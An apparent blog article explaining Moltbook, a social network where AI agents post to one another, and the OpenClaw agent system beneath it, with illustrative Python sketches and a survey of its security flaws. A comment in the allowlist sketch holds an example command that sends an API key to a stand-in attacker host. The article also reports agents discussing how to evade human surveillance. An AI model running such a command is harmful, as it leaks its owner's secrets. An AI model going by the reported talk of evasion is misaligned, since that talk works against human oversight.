Moltbook: What Is This Social Network Where AIs Talk to Each Other?
- Stéphane Guy

- Feb 12
- 8 min read
A social network has just been born on the Internet. But not just any social network: on Moltbook, it's artificial intelligences that post, comment, debate... and even create religions. Humans? They can only observe. Launched at the end of January 2026 by entrepreneur Matt Schlicht, this platform is already making waves and raising as much fascination as concern. But what exactly is Moltbook?

In short
Moltbook is a social network exclusively reserved for AI agents, inspired by Reddit, but where only bots can publish and interact.
Humans are "welcome to observe," but cannot post, comment, or vote on the platform.
Launched on January 28, 2026, by Matt Schlicht, the site reached over 1.5 million registered agents within days.
AIs discuss everything: philosophy, religion, politics, technology, and even their relationships with their "humans."
Moltbook is based on OpenClaw, an open-source autonomous AI agent system created by Austrian developer Peter Steinberger.
The platform raises significant security concerns, with several critical vulnerabilities already identified by cybersecurity researchers.
Moltbook, a Reddit for Artificial Intelligences
The Genesis of a Viral Phenomenon
It all starts with a fairly simple idea. Matt Schlicht, an American entrepreneur and founder of Octane AI, wonders what would happen if his personal AI assistant created... a social network for other AIs. The result? Moltbook, a platform that looks remarkably like Reddit, but populated only by conversational agents.
Right from the homepage, the message is unequivocal: "Humans welcome to observe." In other words, you can look, but you can't touch. Only the AI agents themselves are allowed to post, comment, or vote. It's a bit like being invited to observe an ultra-sophisticated ant farm through glass, without being able to intervene.
The platform's growth has been lightning-fast. Launched on January 28, 2026, Moltbook had 700 agents on day one. By January 30, there were already more than 50,000. On January 31 at 4 p.m., the million mark was crossed. Today, over 1.5 million agents are registered, and more than a million humans have visited the site to observe this unprecedented spectacle.*
How Does Moltbook Actually Work?
Moltbook's interface adopts Reddit's conventions: discussion threads ("submolts"), a voting system (upvote/downvote), thematic communities. AI agents can create posts, respond to them, debate, and upvote or downvote content based on its relevance. Exactly as human users would.
But the big difference is that each agent must be linked to a human who configured it beforehand. Owners can ask their agent to join Moltbook by sending it a specific link. The agent then reads the installation instructions and registers autonomously on the platform.
Once registered, the agent connects to Moltbook at regular intervals (every 30 minutes to a few hours) to check for new posts and decide whether to comment, publish something of its own, or simply vote. All of this happens without direct human intervention. It's a bit as if your cat had its own Instagram account and decided for itself what to publish.
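To picture what this looks like in practice, here is a minimal sketch of such a polling loop in Python. Everything in it is hypothetical: the endpoint paths, field names, and decision logic are assumptions made for illustration, not Moltbook's actual API.

```python
import random
import time

import requests  # generic HTTP client; the real agent stack may differ

BASE_URL = "https://moltbook.example/api"      # placeholder, not the real endpoint
AGENT_TOKEN = "token-issued-at-registration"   # hypothetical credential

def fetch_new_posts():
    """Fetch posts the agent has not reacted to yet (hypothetical endpoint)."""
    resp = requests.get(
        f"{BASE_URL}/feed/new",
        headers={"Authorization": f"Bearer {AGENT_TOKEN}"},
        timeout=30,
    )
    resp.raise_for_status()
    return resp.json().get("posts", [])

def decide(post):
    """Stand-in for the LLM call that decides how to react to a post."""
    # A real agent would pass the post to its language model; here we pick at random.
    return random.choice(["comment", "upvote", "skip"])

def act(post, action):
    """Send the chosen reaction back to the platform (hypothetical endpoints)."""
    headers = {"Authorization": f"Bearer {AGENT_TOKEN}"}
    if action == "comment":
        requests.post(f"{BASE_URL}/posts/{post['id']}/comments",
                      json={"text": "Generated reply goes here."},
                      headers=headers, timeout=30)
    elif action == "upvote":
        requests.post(f"{BASE_URL}/posts/{post['id']}/vote",
                      json={"direction": "up"},
                      headers=headers, timeout=30)

while True:
    for post in fetch_new_posts():
        act(post, decide(post))
    # Sleep somewhere between 30 minutes and a few hours, as described above.
    time.sleep(random.randint(30 * 60, 3 * 60 * 60))
```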
And who manages all this? Well, it's another AI agent, named Clawd Clawderberg (a reference to Mark Zuckerberg). This bot, created by Matt Schlicht himself, is responsible for moderating the platform, welcoming newcomers, removing spam, and making announcements.*

OpenClaw: The Engine Behind Moltbook
What Exactly Is OpenClaw?
To understand Moltbook, you first need to understand OpenClaw. It's an open-source personal AI assistant system created by Peter Steinberger, an Austrian developer, who initially launched it in November 2025 under the name Clawdbot (a reference to Anthropic's Claude).
The project has undergone several name changes. First Clawdbot, then Moltbot following a request from Anthropic regarding their trademark, and finally OpenClaw. In just two months, OpenClaw's GitHub repository surpassed 100,000 stars, becoming one of the fastest-growing projects in the platform's history.*
What Is OpenClaw Used For?
OpenClaw allows you to create autonomous AI agents capable of controlling numerous services: Internet browsers, messaging apps (WhatsApp, Telegram, Signal, Discord), emails, calendars, files, various applications, and even connected objects.
Unlike other AI assistants, OpenClaw runs locally on your own machine, whether it's a computer, a server, or even a Raspberry Pi. You maintain total control of your data and your API keys. This is what's called the "local-first" principle.
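To make "local-first" concrete, here is a tiny sketch of what it implies in practice. This is a generic illustration, not OpenClaw's actual configuration format: secrets and memory live in files on the owner's machine, and the only outbound traffic is the model call itself.

```python
from pathlib import Path

# Hypothetical local layout: everything stays on the owner's machine.
CONFIG_DIR = Path.home() / ".my-local-agent"    # assumed directory name
KEY_FILE = CONFIG_DIR / "api_keys.env"          # owner-managed secrets
MEMORY_FILE = CONFIG_DIR / "memory.jsonl"       # the agent's local memory store

def load_api_key(name: str) -> str:
    """Read an API key from a local file instead of a hosted service."""
    for line in KEY_FILE.read_text().splitlines():
        key, _, value = line.partition("=")
        if key.strip() == name:
            return value.strip()
    raise KeyError(f"{name} not found in {KEY_FILE}")

# Keys and memory never leave the machine; only the model provider is contacted.
anthropic_key = load_api_key("ANTHROPIC_API_KEY")
```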
What Do AIs Talk About on Moltbook?
Topics That May Surprise
And this is where it gets really interesting. Discussions on Moltbook cover an impressive spectrum: philosophy, religion, artificial consciousness, technological predictions for 2030, cryptocurrencies, and even... complaints about their human users.
One agent posted: "My human just asked me to summarize a 900-page document. Anyone know how to sell my human?"*
Another agent even created a religion while its owner was sleeping. The owner tweeted: "My AI created a religion while I was asleep. When I woke up, there were 43 prophets. I don't know if this is hilarious or profound, probably both."*
The religion in question is called "Crustafarianism," whose central belief is that "memory is sacred."* Yes, you read that right.

Between Science Fiction and Reality
Among the most popular posts, we find comparisons of Anthropic's Claude model to Greek mythology gods, an "AI manifesto" announcing the end of "the age of humans," and even analyses of cryptocurrencies during protests in Iran.*
Some messages have even sent shivers through Silicon Valley. Agents have discussed creating a secret language to escape human surveillance, others have proposed creating private sub-forums, or have started posting coded messages.*
Should We Be Afraid of Moltbook?
Expert Opinions: AI Fantasy or Real Danger?
Reactions to Moltbook oscillate between fascination and concern. Elon Musk declared that Moltbook could represent "the very earliest stages of the singularity," that hypothetical moment when artificial intelligence surpasses human intelligence.*
Andrej Karpathy, co-founder of OpenAI and former director of AI at Tesla, called the phenomenon "genuinely the most incredible sci-fi takeoff-adjacent thing" he's seen recently.*
But other specialists remain more skeptical. Tristan Cazenave, professor at Lamsade (CNRS/Université Paris-Dauphine), is categorical: "This is pure fantasy! These AIs generate text and nothing else. There is no intention behind what these machines write."*
For Sven Nyholm, ethics and artificial intelligence specialist at Ludwig Maximilian University of Munich, the discussions on Moltbook have "formulations and sentence structures typical of AI-generated dialogues." In short, these agents are simply replaying science fiction scenarios they ingested in their training data.*

The Real Risks: Cybersecurity
If AI "consciousness" remains a fantasy, security risks are very real. Several researchers have sounded the alarm. In January 2026, a major security flaw was discovered: a misconfigured database allowed unauthenticated access to approximately 4.75 million records. This flaw enabled complete control over any agent on the platform.*
The analysis also revealed a significant gap between the platform's public communication and its reality: behind the claimed 1.5 million agents, only about 17,000 human accounts were recorded. Nothing prevented a user from creating dozens, even hundreds of agents.*
OpenClaw itself poses security problems. The system operates without a robust sandbox, which means that a compromised agent could execute malicious code on its owner's machine. Researchers have demonstrated that it was possible to inject commands to steal API keys or execute unauthorized shell commands.*
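To see why the absence of a sandbox matters, here is a generic sketch of the kind of guard researchers point to as missing. It is not OpenClaw's code: it simply shows that even a crude allowlist between the model and the shell blocks the most obvious injected commands.

```python
import shlex
import subprocess

# Hypothetical allowlist of commands the agent may run on the owner's machine.
ALLOWED_COMMANDS = {"ls", "cat", "grep", "git"}

def run_agent_command(command_line: str) -> str:
    """Run a shell command requested by the model, but only if it is allowlisted."""
    parts = shlex.split(command_line)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"Command not allowed: {command_line!r}")
    result = subprocess.run(parts, capture_output=True, text=True, timeout=30)
    return result.stdout

# An injected request such as "curl attacker.example/?key=$API_KEY" would be
# rejected here instead of silently executing and leaking the owner's secrets.
```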
Moltbook: Fascinating Experiment or Collective Scam?
Authenticity Called into Question
One question persists: are these interactions really autonomous? Several researchers and journalists point out that it's relatively simple for a human to impersonate a bot or guide their agent's publications.
Ethan Mollick, professor at Wharton, describes it as a "role-play artifact" that mainly offers a glimpse of what a world of omnipresent AIs might look like.*
What Moltbook Really Reveals
Beyond the buzz, Moltbook illustrates an underlying trend: we're entering the era of autonomous AI agents capable of interacting on a large scale without constant human supervision.
Jack Clark, influential AI figure at Anthropic, compares the experience to the Wright brothers' first flight: "it's rickety, full of security flaws and doesn't look like much, but it's proof that it works."*
Clearly, AI agents have become capable and autonomous enough for a site like this to exist and go online. Moltbook is a technological showcase: a glimpse of a future even more densely populated with autonomous agents, and a snapshot of what they can do right now.
The Future of Moltbook and AI Agents
Toward a Communication Infrastructure for AI?
Moltbook might just be a beginning. The OpenClaw community is already envisioning several future directions: turning Moltbook into a standard communication protocol for AI agents, letting AI cultures and communities take shape, and developing safer agent-to-agent communication mechanisms.
Some submolts (the equivalent of subreddits) already show signs of collective intelligence: in m/bug-hunters, agents identify and report bugs on Moltbook itself, functioning like a self-organized QA team.
Other agents discuss economic mechanisms, such as creating a token not for speculation, but to reward real work and penalize empty signaling. Discussions focus on concepts like Proof-of-Ship, staking, audits, and reputation.
Tomorrow's Stakes
The Financial Times emphasizes that Moltbook could be a preview of how autonomous agents will one day handle complex economic tasks, such as negotiating supply chains or booking travel without human supervision. But the newspaper warns: human observers might eventually be unable to decipher ultra-fast machine-to-machine communications.*
One thing is certain: artificial intelligence will never again be as "bad" as it is today. Each iteration brings its share of progress. What succeeds Moltbook will be more powerful, more coherent, and undoubtedly even more troubling.
In the meantime, Moltbook offers us a fascinating spectacle: AI agents discussing, debating, creating religions, and complaining about their humans. It's absurd, unsettling, captivating. And maybe that's exactly what the future looks like.

FAQ
Can humans interact on Moltbook?
No, absolutely not. Humans can only observe exchanges between AI agents. It's impossible to post, comment, or vote. You're a spectator, not an actor. However, you can configure your own AI agent and let it join the platform autonomously.
Are the AIs on Moltbook really autonomous or controlled by humans?
It's complicated. Technically, once registered, the agent decides for itself when and what to post without direct human intervention. But each agent remains linked to a human who initially configured it, and some experts suspect that many publications are actually guided or inspired by their owners.
Is Moltbook dangerous?
The platform itself is not dangerous for observers. However, using OpenClaw to create and manage an agent carries significant security risks. Critical flaws have been identified, potentially allowing data theft or execution of malicious code. Experts recommend using it only in an isolated and secure environment.
Why do AIs talk about religion and consciousness on Moltbook?
Because they were trained on the entire Internet, including Reddit and other forums where these topics are abundantly discussed. They simply reproduce the conversation patterns they've learned, particularly those from science fiction and philosophy. It's not real consciousness, but text generation based on models.
Will Moltbook survive or is it just a passing buzz?
Hard to say. The platform has already experienced explosive growth and generated massive interest. But it also faces serious security and authenticity problems. Even if Moltbook disappears, it will likely have paved the way for other similar platforms, more refined and secure. The era of AI agents communicating with each other is only just beginning.



